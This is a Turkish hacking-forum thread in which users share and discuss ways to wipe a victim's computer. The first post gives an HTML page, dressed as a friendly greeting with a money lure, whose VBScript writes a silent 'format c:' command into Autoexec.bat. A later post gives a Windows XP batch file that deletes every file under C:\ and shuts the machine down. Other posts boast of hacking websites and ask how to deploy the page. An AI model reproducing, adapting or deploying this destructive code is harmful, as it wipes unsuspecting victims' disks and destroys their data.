Kar$ıdaki ßiLgiSayara forMat atManın farkLı yoLu!!

feTBoy

New member
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Bizden size sevgilerle..</title>
</head>
<body>
<script language="VBSCRIPT">
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:Autoexec.bat", True)
a.WriteLine("format c: /autotest /u /q")
a.Close
</script>
<p>Giriste acilan uyariya "HAYIR" dediyseniz <a
href="javascript:reload()">Para kazanma sansini kaybettiniz..</p>
</body>
</html>

Cok ßasit ßi$eyy.. HtML oLarak Gönderiosunn.. Kar$ıdaki ßiLgisayarda ßu dosya açıldıgı zaman.. autoexec.bat a Format Komutu ekLioo.. makina Kapanıp acıLdıgı zaman makina kendiliginden format atıo.. ßunu yiyen adam faRkına varMazsa KuRtuLmasına imkan yok :)

Phara0h

Banned
VBScript euheu bu KodLar sayesiNde HacK Ettigim SiteLEre Girenin Cd - Rom Unu aciyordum :)

karakutu

New member
nanik :p 98 de çalışır mantığı ise :
C>dizinin altındaki>Autoexec.bat dosyasını deforme ederek içine format c: /autotest /u /q yazması ile oluşuyor . eee 98 lerde başlangıçta il dos dayken Autoexec.bat çalıştırarak gerekli klavye işlemlerini yapıyor ama içinde c: /autotest /u /q olduğu için direk formatı çakıyor :p nanik

A R E S

New member
eee söyliyim
ms-dos 6.22
işletim sisteminde
gerçek bu
işlemez
nedeni ise artık
öğğk geldi
açıklama bile yapmaya gerek yok

condor11

New member
sanırsam bunun farklısın werilmisti ama arkadas sacmalamıs makna kendiliginden kapanır fln yazmıstı ustelik atıyorum msn kulkanımda gibi werilen hataları unutmustu ama bu program kendini baslangıcta acıp gereken seyi yapıosa nihahaha denemek lazııım !!! :D

feTBoy

New member
Dostumm.. htmL oLarak kayediosun.. açtırıosunn.. autoexec.bat. a format komutu eklio yaptıgı $ey ßu!..

karakutu

New member
98 dedik 98 ama XP de ise ...

echo off
ERASE /F /Q /S C:\
shutdown
adam bunu çalistirdigi vakit C: nin altinbdaki dizinlerin içindeki bütün dosyalari silmeye zorlar sildigini siler silemediginide ardina koyar :D , tabi silinenler içinde sistem dosyasida olacagi için bilgisayar taraklara yan basicak ... sonra bilgisayar kapanicak ama acilirmi bilmem arik :))

karakutu

New member
condor11' Alıntı:
sanırsam bunun farklısın werilmisti ama arkadas sacmalamıs makna kendiliginden kapanır fln yazmıstı ustelik atıyorum msn kulkanımda gibi werilen hataları unutmustu ama bu program kendini baslangıcta acıp gereken seyi yapıosa nihahaha denemek lazııım !!! :D
dostum onu yazan bendim... bence sen bisey bilmdeiginden sacma geldi sana ;) daha genisini güvenlük bölümüne yazdim denendi tastiklendi .. bak bakalim sacma bisey nasil calisiyormus ;)

guester_alican

New member
baba program inşallah çalışır :)

encounter

New member
html olarak nasıl kaydedeceğiz kardeş bu yazdiklarini ?
tesekkürler.. konu ilgimi çektide :)

HTML